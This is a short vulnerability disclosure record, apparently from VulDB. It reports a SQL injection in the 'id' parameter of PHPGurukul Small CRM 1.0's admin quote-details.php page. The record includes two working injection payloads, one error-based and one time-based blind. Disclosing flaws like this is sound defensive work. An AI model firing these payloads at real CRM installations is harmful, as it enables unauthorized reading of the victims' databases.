| Title | phpgurukul Small CRM in PHP 1.0.0 SQL Injection |
|---|---|
| Description | In the file 'quote-details.php' located at '/crm/admin/quote-details.php?id=1', there is a possibility of performing SQL injection on the '?id=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the '?id=' parameter is set to:<br>For error-based:<br>Payload: `id=1' AND (SELECT 7086 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(7086=7086,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XHye`<br>For time-based blind:<br>Payload: `id=1' AND (SELECT 1541 FROM (SELECT(SLEEP(5)))yavg)-- LqgH` |
| Source | ⚠️ https://phpgurukul.com/small-crm-php/ |
| User | Havook (UID 71104) |
| Submission | 26/12/2024 20:15 (1 year ago) |
| Moderation | 28/12/2024 09:35 (2 days later) |
| Status | Accepted |
| VulDB entry | 289661 [PHPGurukul Small CRM 1.0 /admin/quote-details.php ID SQL injection] |
| Points | 20 |